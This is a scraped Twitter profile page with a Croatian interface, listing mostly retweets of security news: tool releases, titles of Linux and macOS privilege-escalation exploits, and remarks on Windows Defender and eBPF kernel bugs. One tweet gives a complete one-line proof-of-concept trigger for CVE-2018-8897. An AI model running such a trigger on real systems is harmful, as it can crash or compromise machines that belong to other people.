Tweetovi

Blokirali ste korisnika/cu @cybertitan_

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @cybertitan_

  1. proslijedio/la je Tweet
    11. kol 2019.
    Poništi
  2. 20. lip 2019.
    Poništi
  3. 3. lip 2019.
    Tweet je nedostupan.
    Poništi
  4. proslijedio/la je Tweet
    6. ruj 2018.
    Poništi
  5. proslijedio/la je Tweet
    6. kol 2018.

    Just in time for , I've released the Ring 0 Army Knife (r0ak) at . Full driver-less, built-in, Windows 8+ Ring 0 arbitrary read/write/execute debugging tool for HVCI/Secure Boot/WDAG environments where local debugging is often impossible to set up.

    Poništi
  6. proslijedio/la je Tweet
    28. srp 2018.

    Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) netfilter target_offset Local Privilege Escalation

    Poništi
  7. proslijedio/la je Tweet
    4. kol 2018.

    gdbgui : Browser-based frontend to gdb (Add breakpoints, view the stack, visualize data structures) :

    Poništi
  8. proslijedio/la je Tweet
    5. lip 2018.

    Great fun talking about T-Fuzz at . Extended presentation: … paper: … source: Questions/collaborations/extensions welcome! (joint HexHive work with Hui Peng and )

    Poništi
  9. proslijedio/la je Tweet
    10. svi 2018.

    cve-2018-8897 in a tweet! echo 'int x;main(){asm("mov %ss,x;mov x,%ss;int3");}'>x.c;cc x.c;gdb a.out -ex 'rwat x' -ex r

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    13. svi 2018.
    Poništi
  11. proslijedio/la je Tweet
    8. svi 2018.
    Poništi
  12. proslijedio/la je Tweet
    15. ožu 2018.

    Finally Ubuntu-4.4.0-117.141 killed bug. Still unpatched in upstream 4.4.121 (though dead code sanitisation helps). and still a 0day on Ubuntu 16.04

    Poništi
  13. proslijedio/la je Tweet
    29. tra 2018.

    Again thanks and for the nice reception at Miami. It is one of the best security conferences on this continent.

    Poništi
  14. proslijedio/la je Tweet
    4. tra 2018.

    I've created a Linux Kernel Defence Map showing the relations between: - vulnerability classes / exploitation techniques, - kernel defences, - bug detection means. Feedback is welcome. Link:

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    2. ožu 2017.

    Local Privilege Escalation for macOS 10.12.2 via mach_voucher and XNU port Feng Shui

    Poništi
  16. 23. tra 2018.
    Poništi
  17. proslijedio/la je Tweet
    5. tra 2018.

    Decodify's stable version is out now. Github: htts://github.com/UltimateHackers/Decodify It can automatically detect and decode different encodings, recursively. Supports: Base64, URL, StringFromChar, Hex, MD5, SHA1, SHA2, decimal, caesar cipher (ROT), reverse strings

    Prikaži ovu nit
    Poništi
  18. proslijedio/la je Tweet
    4. tra 2018.

    mpengine contains unrar code forked from unrar prior to 5.0, introduces new bug while fixing others

    Poništi
  19. proslijedio/la je Tweet

    This is amazing, Windows Defender used the open source unrar code, but changed all the signed ints to unsigned for some reason, breaking the code. noticed and got it fixed. Remote SYSTEM memory corruption 😨

    Poništi
  20. proslijedio/la je Tweet
    20. pro 2017.

    Pour one out for this really nice Linux kernel bugdoor that P0 killed a few hours ago. Straight up unlimited R/W to all kernel memory via ebpf verifier bypass. One of the best/worst Linux kernel vulns of all time

    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·